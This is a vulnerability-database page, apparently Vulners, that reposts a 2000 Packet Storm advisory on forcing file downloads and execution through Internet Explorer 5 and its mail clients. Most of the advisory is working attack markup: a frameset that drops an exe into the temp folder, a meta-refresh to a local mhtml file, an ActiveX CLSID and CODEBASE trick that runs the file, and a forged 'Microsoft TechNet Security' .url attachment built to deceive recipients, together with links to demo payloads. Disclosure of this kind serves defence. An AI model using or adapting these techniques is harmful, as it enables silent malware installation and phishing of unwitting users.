Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ie5.force-feed.txt

🗓️ 29 Jun 2000 00:00:00Reported by malware.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Microsoft Internet Explorer 5 can ignore user prompts, forcing file downloads onto computers.

Code
`Saturday, 24 June 2000  
  
Microsoft Internet Explorer 5 and accompanying mail and news clients  
on win95, win98 and win2000 enjoy a unique status in that they  
choose to ignore user input. Specifically, we are able to manually  
force a file onto the target computer despite all prompts and warnings.  
  
A)  
  
1. How so?  
  
We again create a very simple html frameset and embed in base 64 our  
file:  
  
<frameset rows=3D"10%,*">  
<frame src=3D"mars.exe" >  
</frameset>  
  
2. What will happen?  
  
We create a simple html mail or news file and send it to the target  
computer. Upon receipt and opening, the recipient will be prompted  
whether they wish to 'save' or 'open' or 'cancel' - neither of these  
work. While the recipient contemplates the choices, the file is  
injected into the temp folder. Selecting any one of the three  
choices proves useless. The file is still delivered to the temp folder. In  
addition setting the so-called Security Zone settings to: DISABLE generates  
a different prompt that is: "...your security settings do not allow file  
downloads...[something to this effect]" with the only option being: OK.  
Again selecting this proves useless.  
=20  
The file is still delivered to the temp folder.  
  
3. And?  
  
Whe then create a second file containing a different new ActiveX  
control(CLSID:15589FA1-C456-11CE-BF01-00AA0055595A) which allows us to  
execute files locally. We embed the simple JavaScripting that runs  
this together with the ActiveX control in base64 and embed that in a  
second html frame:  
  
<frameset rows=3D"10%,*">  
<frame src=3D"mars.exe" >  
<frame src=3D"lunar.mhtml" >  
</frameset>  
  
We again apply the very simple HTTP-EQUIV meta tag known as refresh.  
  
<meta http-equiv=3D"refresh"content=3D"5;  
url=3Dmhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">  
  
and repack once again in base64.  
  
4. Results being?  
  
On the following generic and diluted web-based working example the  
link is clicked, the file mars.mhtml will deposit both the *.exe and  
second *.mhtml files into the temp. The client will be prompted as  
to either 'save' 'open' or 'cancel' regardless of the choice as soon  
as the prompt has been closed down, the meta refresh will bounce to  
the *.mhtml in the temp, open it and execute the JavaScript and  
ActiveX control and run the *.exe.  
  
Again, because we are working locally (from C:\WINDOWS\TEMP) none of  
the so-called Security Zone settings apply.  
  
Working Example:  
  
Note: to be executed off the web. Harmless *.exe incorporated. 5-second  
delay after clearing the prompt  
  
http://members.xoom.com/malware/mars.mhtml  
  
B)  
  
5. Can we do this from email?  
  
Yes. However, with greater likelihood of failure. Consider the  
following:  
  
Create two sets of html messages:  
  
(a) one comprising the file to be delivered:  
  
  
<frameset rows=3D"10%,*">  
<frame src=3D"refresh.bat" >  
</frameset>  
  
Working Example:  
  
Note: to be executed from mail client. Simple *.bat containing @exit  
  
http://members.xoom.com/malware/refresh.eml  
  
(b) the second comprising a fraudulent, manufactured *.url:  
  
Content-Type: application/octet-stream;  
name=3D"Microsoft TechNet Security.url"  
Content-Transfer-Encoding: 7bit  
Content-Disposition: attachment;  
filename=3D"Microsoft TechNet Security.url"  
  
[DEFAULT]  
BASEURL=3DC:\WINDOWS\TEMP\refresh.bat  
[InternetShortcut]  
URL=3DC:\WINDOWS\TEMP\refresh.bat  
  
We include a fake link: <font color=3Dblue style=3D"cursor:hand">....  
  
The recipient will then be forced to entertain the fraudulent *.url  
  
Working Example:  
  
Note: to be executed from mail client.  
  
http://members.xoom.com/malware/secureme.eml  
  
6. Far Fetched Scenario?  
  
Yes indeed. Send the first mail message to the target computer  
followed by the second. The recipient will open the first mail  
message, be advised that a file is attempting to download and  
what would they like to do: 'save' or 'open' or 'cancel' while this  
is being contemplated, the file is delivered to the temp folder. The  
recipient then continues with their morning activities of reading  
their email and opens the second mail message. Certainly innocent  
enough looking and of course Urgent and from a Trusted Source=99.  
Through the false link, they are then forced open the attached *.url  
which points to the C:\WINDOWS\TEMP\ where the delivered file waits.  
  
This scenario can be incorporated into one single self-contained  
mail message. However the likelihood of the recipient after noting  
an attempted file download warning and then continuing with opening  
the *.url would (or should) be even slimmer. However, you never  
know.  
  
Notes:  
  
1. Tested on default installs of win95, win98 and win2000 and IE5.0  
and IE5.1 with accompanying mail and news clients. All up-to-date with  
security patches and all with the so-called Security Zone set to: DISABLE  
where possible.  
  
2. The Outlook Patch should effectively contain or disallow the  
*.url attachment. There is a workaround for that.  
  
3. The files are still delivered to the default temp folder.  
Relocate the default temp folder.  
  
4. Submitted to CERT 6/23/00 VU#26654  
  
--  
  
  
Regarding the mars exploit demo at  
http://members.xoom.com/malware/mars.mhtml. There seems to be two seperate  
problems being exploited here for the desired effect of downloading and  
executing code.  
  
You can get any local .exe to execute in IE by refering to it in the  
CODEBASE parameter of an ActiveX object tag. The CLASSID can be anything  
but all zeros. Here is a code snippet, courtesy of Dildog, which will  
execute calc.exe if it is in c:\windows\system32\  
  
<HTML>  
<HEAD>  
</HEAD>  
<BODY>  
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'  
CODEBASE='c:\windows\system32\calc.exe'></OBJECT>  
</BODY></HTML>  
  
The other problem is the fact that .exe files can get downloaded to your  
local system without you being able to cancel the operation. I tested the  
malware exploit on win98 with medium security settings (the default) and  
it worked as promised.  
  
But what was far worse was it worked at the high security setting also. A  
warning message came up saying "Due to your security settings you cannot  
download that file." You press OK and the file is downloaded anyway. Then  
it executes when used as the codebase of an ActiveX control.  
  
The demo exploit won't work in W2K because the temp directory where the  
.exe is downloaded to is "c:\documents and  
settings\'username'\local settings\temp". If it is possible to get the  
username through JavaScript and another ActiveX control it could possibly  
be made to work there also.  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jun 2000 00:00Current
7.4High risk
Vulners AI Score7.4
internet explorer securityfile download bypassuser input ignoreactivex control exploitbase64 encoding.
23